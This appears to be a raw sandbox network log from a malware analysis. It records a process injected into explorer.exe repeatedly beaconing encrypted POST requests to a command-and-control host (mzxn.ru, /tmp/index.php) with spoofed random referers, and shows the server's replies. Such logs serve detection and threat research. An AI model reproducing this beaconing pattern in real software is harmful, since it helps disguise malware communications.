                                                                              Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 0d 7f 48 e6 3d 09 f2 e8 42 f1 91 ed a1 31 da 2d da f5 6c 49 10 98 9f 9f dd 2a d1 26 10
                                                                              Data Ascii: #\6H=B1-lI*&


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              21192.168.2.449763187.199.183.102802580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jul 27, 2024 14:53:21.279099941 CEST277OUTPOST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://jtjyrojvaxip.com/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 339
                                                                              Host: mzxn.ru
                                                                              Jul 27, 2024 14:53:21.279129028 CEST339OUTData Raw: 3b 6e 53 14 82 cd 1c 53 dc ac c4 07 70 77 08 cc 09 08 c1 90 1f 71 92 16 7b 7c 7b 90 49 c1 c4 63 e9 5e b4 5a 0f 69 22 6d 98 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2c 5b 05 6b 2c 90 f4 76 0b 75 3d 3d fd e1
                                                                              Data Ascii: ;nSSpwq{|{Ic^Zi"m? 9Yt M@NA ,[k,vu==R:fZixj8vmx@po,-*L/X :T,GH6M3R$r"SOJ6KHxzOtd'G{
                                                                              Jul 27, 2024 14:53:22.332906008 CEST484INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sat, 27 Jul 2024 12:53:22 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              22192.168.2.449765187.199.183.102802580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jul 27, 2024 14:53:22.341445923 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://yldujrgvckqrx.org/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 262
                                                                              Host: mzxn.ru
                                                                              Jul 27, 2024 14:53:22.341476917 CEST262OUTData Raw: 3b 6e 53 14 82 cd 1c 53 dc ac c4 07 70 77 08 cc 09 08 c1 90 1f 71 92 16 7b 7c 7b 90 49 c1 c4 63 e9 5e b4 5a 0f 69 22 6d 98 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1a 6b 2c 90 f5 76 0b 75 25 0f be b9
                                                                              Data Ascii: ;nSSpwq{|{Ic^Zi"m? 9Yt M@NA -[k,vu%KmNXd Z9N<>2zuL{B20uU#.vP"{yY/jM<weRRM(g-kkIDfg{IUt
                                                                              Jul 27, 2024 14:53:23.381913900 CEST484INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sat, 27 Jul 2024 12:53:23 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              23192.168.2.449768187.199.183.102802580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jul 27, 2024 14:53:23.390955925 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://luwfiaifgqhasu.com/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 268
                                                                              Host: mzxn.ru
                                                                              Jul 27, 2024 14:53:23.390978098 CEST268OUTData Raw: 3b 6e 53 14 82 cd 1c 53 dc ac c4 07 70 77 08 cc 09 08 c1 90 1f 71 92 16 7b 7c 7b 90 49 c1 c4 63 e9 5e b4 5a 0f 69 22 6d 98 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1b 6b 2c 90 f5 76 0b 75 2f 47 af fc
                                                                              Data Ascii: ;nSSpwq{|{Ic^Zi"m? 9Yt M@NA -[k,vu/GW"Z~wwN*^17r*x&z'?Nb?2C\w[jq[2oF&l~@H5)/SDx,X?Y"'
                                                                              Jul 27, 2024 14:53:24.455123901 CEST484INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sat, 27 Jul 2024 12:53:24 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              24192.168.2.449770187.199.183.102802580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jul 27, 2024 14:53:24.462613106 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://caikuwutundsm.net/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 367
                                                                              Host: mzxn.ru
                                                                              Jul 27, 2024 14:53:24.462646008 CEST367OUTData Raw: 3b 6e 53 14 82 cd 1c 53 dc ac c4 07 70 77 08 cc 09 08 c1 90 1f 71 92 16 7b 7c 7b 90 49 c1 c4 63 e9 5e b4 5a 0f 69 22 6d 98 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 18 6b 2c 90 f5 76 0b 75 31 20 ac 9a
                                                                              Data Ascii: ;nSSpwq{|{Ic^Zi"m? 9Yt M@NA -[k,vu1 Mf:3[0!wt.qW2hY0"(&J+A)m!V-MG4zJ5\A'4nwXnbC@x`XT_=
                                                                              Jul 27, 2024 14:53:25.533337116 CEST137INHTTP/1.1 200 OK
                                                                              Server: nginx/1.26.0
                                                                              Date: Sat, 27 Jul 2024 12:53:25 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              25192.168.2.449819187.199.183.102802580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jul 27, 2024 14:54:32.792155981 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://gbpatnncurmtwi.net/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 137
                                                                              Host: mzxn.ru
                                                                              Jul 27, 2024 14:54:32.792155981 CEST137OUTData Raw: 3b 6e 53 14 82 cd 1c 53 dc ac c4 07 70 77 08 cc 09 08 c1 90 1f 71 92 16 7b 7c 7b 90 49 c1 c4 63 e9 5e b4 5a 0f 69 22 6d 98 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 72 5b d1 81
                                                                              Data Ascii: ;nSSpwq{|{Ic^Zi"m? 9Yt M@NA .[k,vur[1bJ|dz m+XWL-J26V+
                                                                              Jul 27, 2024 14:54:33.846288919 CEST151INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sat, 27 Jul 2024 12:54:33 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Raw: 03 00 00 00 72 e8 84
                                                                              Data Ascii: r


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              26192.168.2.449823187.199.183.102802580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jul 27, 2024 14:54:38.442140102 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://uscjenooturcoqoa.org/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 188
                                                                              Host: mzxn.ru
                                                                              Jul 27, 2024 14:54:38.442157030 CEST188OUTData Raw: 3b 6e 53 14 82 cd 1c 53 dc ac c4 07 70 77 08 cc 09 08 c1 90 1f 71 92 16 7b 7c 7b 90 49 c1 c4 63 e9 5e b4 5a 0f 69 22 6d 98 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 2f 30 d5 bc
                                                                              Data Ascii: ;nSSpwq{|{Ic^Zi"m? 9Yt M@NA .[k,vu/0r@v\7;:\*;^`!oiC`UE"4pD7fzCB"_,?K
                                                                              Jul 27, 2024 14:54:39.497384071 CEST151INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sat, 27 Jul 2024 12:54:39 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Raw: 03 00 00 00 72 e8 84
                                                                              Data Ascii: r


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              27192.168.2.449827187.199.183.102802580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jul 27, 2024 14:54:43.418462992 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://grdkefqyouewk.org/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 191
                                                                              Host: mzxn.ru
                                                                              Jul 27, 2024 14:54:43.418494940 CEST191OUTData Raw: 3b 6e 53 14 82 cd 1c 53 dc ac c4 07 70 77 08 cc 09 08 c1 90 1f 71 92 16 7b 7c 7b 90 49 c1 c4 63 e9 5e b4 5a 0f 69 22 6d 98 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 3d 29 d5 bb
                                                                              Data Ascii: ;nSSpwq{|{Ic^Zi"m? 9Yt M@NA .[k,vu=)Q \zj4<mK]) d7+$)O;#$"R[A%0`gS7k\[dJ
                                                                              Jul 27, 2024 14:54:44.446554899 CEST151INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sat, 27 Jul 2024 12:54:44 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Raw: 03 00 00 00 72 e8 84
                                                                              Data Ascii: r


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              28192.168.2.449830187.199.183.102802580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jul 27, 2024 14:54:48.575032949 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://cygkjkiviqedpm.com/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 159
                                                                              Host: mzxn.ru
                                                                              Jul 27, 2024 14:54:48.575068951 CEST159OUTData Raw: 3b 6e 53 14 82 cd 1c 53 dc ac c4 07 70 77 08 cc 09 08 c1 90 1f 71 92 16 7b 7c 7b 90 49 c1 c4 63 e9 5e b4 5a 0f 69 22 6d 98 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 20 01 c2 bb
                                                                              Data Ascii: ;nSSpwq{|{Ic^Zi"m? 9Yt M@NA .[k,vu `WAnFahAF!u\+J25TYFa4D
                                                                              Jul 27, 2024 14:54:49.649045944 CEST151INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sat, 27 Jul 2024 12:54:49 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Raw: 03 00 00 00 72 e8 84
                                                                              Data Ascii: r


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              29192.168.2.449834187.199.183.102802580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jul 27, 2024 14:54:54.225884914 CEST276OUTPOST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://qomfulqdiho.com/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 212
                                                                              Host: mzxn.ru
                                                                              Jul 27, 2024 14:54:54.225918055 CEST212OUTData Raw: 3b 6e 53 14 82 cd 1c 53 dc ac c4 07 70 77 08 cc 09 08 c1 90 1f 71 92 16 7b 7c 7b 90 49 c1 c4 63 e9 5e b4 5a 0f 69 22 6d 98 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 4a 3f f3 f8
                                                                              Data Ascii: ;nSSpwq{|{Ic^Zi"m? 9Yt M@NA .[k,vuJ?Evravc=yE(`;K9]sy>&}Tf@~Q BYu_1Y1@Jl(A
                                                                              Jul 27, 2024 14:54:55.268202066 CEST151INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sat, 27 Jul 2024 12:54:55 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Raw: 03 00 00 00 72 e8 84
                                                                              Data Ascii: r


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              30192.168.2.449839185.18.245.58802580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jul 27, 2024 14:55:02.504117966 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://vjfcjpfahwpvryik.org/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 201
                                                                              Host: mzxn.ru
                                                                              Jul 27, 2024 14:55:02.504153013 CEST201OUTData Raw: 3b 6e 53 14 82 cd 1c 53 dc ac c4 07 70 77 08 cc 09 08 c1 90 1f 71 92 16 7b 7c 7b 90 49 c1 c4 63 e9 5e b4 5a 0f 69 22 6d 98 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 2b 46 cb e7
                                                                              Data Ascii: ;nSSpwq{|{Ic^Zi"m? 9Yt M@NA .[k,vu+FR^s<_3~5W6k@'Fq?,Pkw97mFUO~S;fZN
                                                                              Jul 27, 2024 14:55:03.445756912 CEST151INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sat, 27 Jul 2024 12:55:03 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Raw: 03 00 00 00 72 e8 84
                                                                              Data Ascii: r


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              31192.168.2.449843185.18.245.58802580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jul 27, 2024 14:55:07.838290930 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://kxorbjsgbgmdfrl.org/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 175
                                                                              Host: mzxn.ru
                                                                              Jul 27, 2024 14:55:07.838319063 CEST175OUTData Raw: 3b 6e 53 14 82 cd 1c 53 dc ac c4 07 70 77 08 cc 09 08 c1 90 1f 71 92 16 7b 7c 7b 90 49 c1 c4 63 e9 5e b4 5a 0f 69 22 6d 98 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 58 14 ac bc
                                                                              Data Ascii: ;nSSpwq{|{Ic^Zi"m? 9Yt M@NA .[k,vuXThkAlk`n6%5tTY2=K/(^{5I"n~=FaG/4R
                                                                              Jul 27, 2024 14:55:08.805416107 CEST151INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sat, 27 Jul 2024 12:55:08 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Raw: 03 00 00 00 72 e8 84
                                                                              Data Ascii: r


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              32192.168.2.449847185.18.245.58802580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jul 27, 2024 14:55:12.964751959 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://uyxucdsovulqgtjk.org/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 190
                                                                              Host: mzxn.ru
                                                                              Jul 27, 2024 14:55:12.964751959 CEST190OUTData Raw: 3b 6e 53 14 82 cd 1c 53 dc ac c4 07 70 77 08 cc 09 08 c1 90 1f 71 92 16 7b 7c 7b 90 49 c1 c4 63 e9 5e b4 5a 0f 69 22 6d 98 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 26 5b a0 a9
                                                                              Data Ascii: ;nSSpwq{|{Ic^Zi"m? 9Yt M@NA .[k,vu&[XAjmk`K*yoC;{O9/&z65Oku[I#yES8&\O!
                                                                              Jul 27, 2024 14:55:13.904712915 CEST151INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sat, 27 Jul 2024 12:55:13 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Raw: 03 00 00 00 72 e8 84
                                                                              Data Ascii: r


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              33192.168.2.449851185.18.245.58802580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jul 27, 2024 14:55:18.159461021 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://ibglipwvpfkcey.com/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 364
                                                                              Host: mzxn.ru
                                                                              Jul 27, 2024 14:55:18.159490108 CEST364OUTData Raw: 3b 6e 53 14 82 cd 1c 53 dc ac c4 07 70 77 08 cc 09 08 c1 90 1f 71 92 16 7b 7c 7b 90 49 c1 c4 63 e9 5e b4 5a 0f 69 22 6d 98 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 52 19 a2 fa
                                                                              Data Ascii: ;nSSpwq{|{Ic^Zi"m? 9Yt M@NA .[k,vuR{K|s\?Slhj@;p=]:C_YzKFIJ_[DH`*^#2) ?xd=ZRrZDDhHDac>3
                                                                              Jul 27, 2024 14:55:19.116383076 CEST151INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sat, 27 Jul 2024 12:55:18 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Raw: 03 00 00 00 72 e8 84
                                                                              Data Ascii: r


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              34192.168.2.449854185.18.245.58802580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jul 27, 2024 14:55:23.043626070 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://ocdcprhbwfbxhxuk.com/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 294
                                                                              Host: mzxn.ru
                                                                              Jul 27, 2024 14:55:23.043658972 CEST294OUTData Raw: 3b 6e 53 14 82 cd 1c 53 dc ac c4 07 70 77 08 cc 09 08 c1 90 1f 71 92 16 7b 7c 7b 90 49 c1 c4 63 e9 5e b4 5a 0f 69 22 6d 98 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 42 08 c1 86
                                                                              Data Ascii: ;nSSpwq{|{Ic^Zi"m? 9Yt M@NA .[k,vuByoE{14WDyBu+uH!=KM@QEZ%5+2>y>:&0'H+\!n*)qsAZ
                                                                              Jul 27, 2024 14:55:23.985213995 CEST151INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sat, 27 Jul 2024 12:55:23 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Raw: 03 00 00 00 72 e8 84
                                                                              Data Ascii: r


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              35192.168.2.449858185.18.245.58802580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jul 27, 2024 14:55:28.029972076 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://pkmludkekcakr.org/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 171
                                                                              Host: mzxn.ru
                                                                              Jul 27, 2024 14:55:28.030020952 CEST171OUTData Raw: 3b 6e 53 14 82 cd 1c 53 dc ac c4 07 70 77 08 cc 09 08 c1 90 1f 71 92 16 7b 7c 7b 90 49 c1 c4 63 e9 5e b4 5a 0f 69 22 6d 98 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 4a 08 c8 be
                                                                              Data Ascii: ;nSSpwq{|{Ic^Zi"m? 9Yt M@NA .[k,vuJ.eUrWO~AM$G> &GNexO%+r$j
                                                                              Jul 27, 2024 14:55:28.977416992 CEST151INHTTP/1.1 404 Not Found
